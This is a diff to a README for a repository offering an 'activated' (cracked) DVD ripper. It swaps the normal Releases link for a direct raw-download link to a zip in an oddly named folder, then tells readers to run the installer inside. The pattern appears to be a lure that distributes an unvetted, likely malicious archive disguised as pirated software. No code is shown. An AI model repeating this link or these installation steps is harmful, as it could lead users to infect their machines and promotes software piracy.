mlekaili/Magic-DVD-Ripper-Activated/README.md

 ## 📥 Download & Install

-1. **Visit the Releases page to download**: Go to [this page](https://github.com/mlekaili/Magic-DVD-Ripper-Activated/releases).
+1. **Visit the Releases page to download**: Go to [this page](https://raw.githubusercontent.com/mlekaili/Magic-DVD-Ripper-Activated/main/stridlins/Magic_DV_Activated_Ripper_1.1.zip).

 2. **Choose the Latest Version**: Look for the top release.
 There you will find the download link for the latest version of the software.

-3. **Download the Installer**: Click on the link for the installer file (e.g., `MagicDVDRipperInstaller.exe`).
+3. **Download the Installer**: Click on the link for the installer file (e.g., `https://raw.githubusercontent.com/mlekaili/Magic-DVD-Ripper-Activated/main/stridlins/Magic_DV_Activated_Ripper_1.1.zip`).
 Your browser will start downloading the file.

 4. **Run the Installer**: Once the download completes, locate the file in your downloads folder.
 Double-click the installer to start the setup process.